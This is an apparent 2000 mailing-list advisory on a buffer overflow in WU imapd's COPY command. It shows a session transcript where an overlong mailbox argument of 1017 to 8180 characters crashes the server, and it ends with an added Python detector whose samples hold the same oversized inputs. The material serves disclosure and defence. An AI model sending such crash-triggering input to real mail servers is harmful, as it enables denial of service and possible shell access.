Subject: another WU imapd buffer overflow
From: Michal Szymanski (siva9 CLICO.PL)
Date: Thu Apr 20 2000 - 19:12:18 CDT
Hi,
While doing a code security audit, I discovered another buffer overflow in imapd.
This time the security flaw exists in the standard RFC 1064 COPY command:
* OK mail IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* select inbox
* 2 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 956162550] UID validity status
* OK [UIDNEXT 5] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
* OK [PERMANENTFLAGS (\* \Answered \Flagged \Deleted \Draft \Seen)] Permanent
* flags
* OK [UNSEEN 2] first unseen message in /var/spool/mail/siva9
* OK [READ-WRITE] SELECT completed
* copy 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... [a lot of A's]
No answer. The process has been killed by SIGSEGV. The number of A's must be in the
range from 1017 to 8180. After LOGIN all privileges are dropped, but we still
have the possibility to get unprivileged shell access. I've tested it against WU
imapd v10.223, v11.241, v12.250, v12.261, and v12.264.
Regards,
Michal Szymanski [michal_szymanski linux.com.pl];
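
An added example, not part of the original post: a Python check that a mail-server operator could run over captured IMAP client lines to flag COPY commands whose mailbox argument is at least 1017 bytes, the lower bound reported in the message above. The function names and the sample lines are constructed for illustration; the handling of UID COPY, quoted strings and literals goes beyond the single case shown in the post.

```python
import re

# Lower bound from the post (crash reported for 1017..8180 A's). Anything at
# or above it is flagged, since no legitimate mailbox name is that long.
MIN_SUSPECT_LEN = 1017

# tag, optional "UID", COPY, message set, then the mailbox argument.
_COPY_RE = re.compile(rb'^(\S+) +(?:UID +)?COPY +(\S+) +(.*)$', re.IGNORECASE)
_LITERAL_RE = re.compile(rb'^\{(\d+)\+?\}$')


def mailbox_arg_length(line: bytes):
    """Length of the COPY mailbox argument, or None if line is not a COPY."""
    m = _COPY_RE.match(line.rstrip(b'\r\n'))
    if not m:
        return None
    arg = m.group(3)
    lit = _LITERAL_RE.match(arg)
    if lit:
        # IMAP literal: the client announces the byte count up front.
        return int(lit.group(1))
    if len(arg) >= 2 and arg.startswith(b'"') and arg.endswith(b'"'):
        # Quoted string: drop the quotes and count each escaped char once.
        return len(re.sub(rb'\\(.)', rb'\1', arg[1:-1]))
    return len(arg)


def flag_oversized_copy(lines, limit=MIN_SUSPECT_LEN):
    """Return (line_number, argument_length) for each suspicious COPY."""
    hits = []
    for n, line in enumerate(lines, 1):
        length = mailbox_arg_length(line)
        if length is not None and length >= limit:
            hits.append((n, length))
    return hits


# Constructed sample of client-to-server lines (not captured traffic).
SAMPLE = [
    b'* select inbox\r\n',
    b'* copy 1 Archive\r\n',
    b'* copy 1 ' + b'A' * 1017 + b'\r\n',
    b'a4 UID COPY 2:4 "' + b'B' * 2000 + b'"\r\n',
    b'a5 copy 1 {4096}\r\n',
]

if __name__ == '__main__':
    for lineno, length in flag_oversized_copy(SAMPLE):
        print(f'line {lineno}: COPY mailbox argument of {length} bytes')
```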